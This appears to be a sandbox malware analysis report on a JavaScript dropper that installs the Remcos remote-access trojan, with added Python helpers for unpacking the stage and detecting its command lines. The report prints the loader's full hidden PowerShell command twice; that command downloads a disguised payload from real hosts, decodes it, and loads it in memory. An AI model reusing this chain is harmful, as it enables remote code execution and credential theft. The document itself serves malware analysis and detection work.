Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winJS@18/12@3/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\uploaded_textfile[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-QM0FWK
Source: C:\Windows\System32\wscript.exe | File created: C:\Windows\Temp\???2????4????4????5.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | System information queried: HandleInformation
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: MSBuild.exe, MSBuild.exe, 0000000C.00000002.2753023863.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: MSBuild.exe, 0000000B.00000002.2763609034.00000000032AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PO_0099822111ORDER.js | Virustotal: Detection: 14%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '…'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"
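The second PowerShell in the tree above is the whole staging logic in one line: it downloads a file served as a .jpg, keeps the text between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses that text character by character (the `[-1..-($meteoritic.Length)]` slice), base64-decodes it into a .NET assembly, and calls `dnlib.IO.Home.VAI` with a first argument that is an https URL written backwards (the Sigma hit "Paste sharing url in reverse order"). Note also that `$walled -ge 0 -and $highlighted -gt $walled` is evaluated but never branched on. The script below is an added triage helper written for this page, not code from the sample or from Joe Sandbox: it reproduces the unwrap offline, checks that what falls out is a PE image (what `Assembly.Load` expects), and un-reverses the argument. The "downloaded" text and the "assembly" it contains are constructed stand-ins, not data recovered from the real URL.

```python
import base64
import re

# Marker strings copied from the PowerShell loader's command line in the report.
START_MARKER = "<<BASE64_START>>"
END_MARKER = "<<BASE64_END>>"


def extract_between(text: str, start: str = START_MARKER, end: str = END_MARKER) -> str:
    """Text between the markers, mirroring the loader's IndexOf/Substring arithmetic.

    The loader computes `$walled -ge 0 -and $highlighted -gt $walled` but never acts on
    it; here the same condition is enforced so bad input fails instead of decoding junk.
    """
    lo = text.find(start)
    hi = text.find(end)
    if lo < 0 or hi <= lo:
        raise ValueError("payload markers missing or out of order")
    return text[lo + len(start):hi]


def reverse_string(s: str) -> str:
    """The loader's `ToCharArray() ... [-1..-(Length)]` slice is plain character reversal."""
    return s[::-1]


def decode_reversed_base64(blob: str) -> bytes:
    """Undo the reversal, drop stray whitespace, then base64-decode with strict validation."""
    cleaned = re.sub(r"\s+", "", reverse_string(blob))
    cleaned += "=" * (-len(cleaned) % 4)          # tolerate stripped padding only
    return base64.b64decode(cleaned, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Assembly.Load() takes a PE image: require an MZ stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_stage(downloaded_text: str) -> dict:
    """Run the full unwrap on the text the loader fetched and summarise what came out."""
    payload = decode_reversed_base64(extract_between(downloaded_text))
    return {"size": len(payload), "is_pe": looks_like_pe(payload), "payload": payload}


def unreverse_argument(arg: str) -> str:
    """First argument passed to dnlib.IO.Home.VAI in the report: a URL written backwards."""
    return reverse_string(arg)


# --- constructed stand-ins (not data from the sample) -------------------------------------
def build_fake_assembly() -> bytes:
    """A 64-byte DOS header with e_lfanew = 0x40, followed by a PE signature and filler."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\x00\x00" + b"constructed stand-in, not a real assembly"


def build_fake_download(assembly: bytes) -> str:
    """What the 'jpg' looks like in the loader's scheme: markers around base64 written backwards."""
    b64 = base64.b64encode(assembly).decode("ascii")
    return "noise before\n" + START_MARKER + reverse_string(b64) + END_MARKER + "\nnoise after"


if __name__ == "__main__":
    sample = build_fake_download(build_fake_assembly())
    result = recover_stage(sample)
    print(f"recovered {result['size']} bytes, PE header present: {result['is_pe']}")
    print("C2 argument:", unreverse_argument("0/tBcDi/r/ee.etsap//:sptth"))
```

Run against the real download, `recover_stage` gives the analyst the assembly to hand to a .NET decompiler; `unreverse_argument` turns `0/tBcDi/r/ee.etsap//:sptth` into the paste.ee URL the report's pastebin-related signatures refer to.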
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.jsJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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 to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to 
behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"Jump to behavior
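The process chain recorded above (powershell.exe launching a second, hidden, execution-policy-bypassed powershell.exe that reflectively loads an assembly and names MSBuild, then MSBuild.exe, then MSBuild.exe with /stext output files) carries the command-line traits that the Sigma hits in this report key on: a backwards-written URL, a paste-service host in reverse order, FromBase64String, Assembly::Load. The Python below is an added example, not part of the report and not Joe Sandbox's or Sigma's detection logic, that scores a command line on those traits and reverses any backwards URL it finds. The command line is abridged from the report; the other two inputs, the paste hosts beyond paste.ee and the verdict thresholds are the example's own assumptions.

```python
import re

# Paste services whose hostnames are matched backwards. paste.ee is the one
# the report's command line reverses; the others are an assumption added
# to generalise the rule beyond this sample.
PASTE_HOSTS = ["paste.ee", "pastebin.com", "paste.rs", "hastebin.com"]

RULES = {
    "reversed_https":      re.compile(r"//:s?ptth"),
    "reversed_paste_host": re.compile("|".join(re.escape(h[::-1]) for h in PASTE_HOSTS)),
    "char_reverse_idiom":  re.compile(r"\[-1\.\.-\("),  # ToCharArray()[-1..-(len)]
    "from_base64":         re.compile(r"FromBase64String", re.IGNORECASE),
    "reflective_load":     re.compile(r"\[System\.Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE),
    "webclient_download":  re.compile(r"Net\.WebClient|DownloadData|DownloadString", re.IGNORECASE),
    "exec_policy_bypass":  re.compile(r"-e\w*\s+bypass", re.IGNORECASE),   # -ep / -executionpolicy
    "hidden_window":       re.compile(r"-w\w*\s+hidden", re.IGNORECASE),   # -w / -windowstyle
    "msbuild_hint":        re.compile(r"\bMSBuild\b"),
}

# A quoted string that ends in a backwards "http(s)://" is a reversed URL.
REVERSED_URL = re.compile(r"""["']([^"']*//:s?ptth)["']""")


def recover_reversed_urls(cmdline: str):
    """Return every backwards-written URL in the command line, reversed back."""
    return [m[::-1] for m in REVERSED_URL.findall(cmdline)]


def score_command_line(cmdline: str) -> dict:
    """Return the rule names that fire, a verdict and any recovered URLs.
    Thresholds are the example's own: a reversed URL combined with base64
    decoding or an in-memory assembly load is rated high by itself."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    reversed_url = "reversed_https" in hits or "reversed_paste_host" in hits
    decode_or_load = "from_base64" in hits or "reflective_load" in hits
    if reversed_url and decode_or_load:
        verdict = "high"
    elif len(hits) >= 3:
        verdict = "medium"
    else:
        verdict = "low"
    return {"verdict": verdict, "hits": hits, "urls": recover_reversed_urls(cmdline)}


# Abridged from the report's second powershell.exe command line (the
# PSVersionTable no-ops and most of the VAI argument array are cut).
REPORT_CMDLINE = (
    "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command \""
    "$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';"
    "$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);"
    "$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];"
    "$pervasivenesses = [System.Convert]::FromBase64String($orcas);"
    "$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);"
    "$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'MSBuild'))\""
)

# Constructed benign admin line for contrast.
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\""

# Constructed download cradle without the reversal tricks: several traits, no reversed URL.
DOWNLOAD_CRADLE_CMDLINE = (
    "powershell.exe -w hidden -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""
)

if __name__ == "__main__":
    for line in (REPORT_CMDLINE, BENIGN_CMDLINE, DOWNLOAD_CRADLE_CMDLINE):
        print(score_command_line(line))
```

The reversed-URL rule is the cheap one to keep in a SIEM: a literal `//:sptth` or `//:ptth` has no legitimate reason to appear in a process command line, and reversing the quoted string yields the indicator directly without running anything.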
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
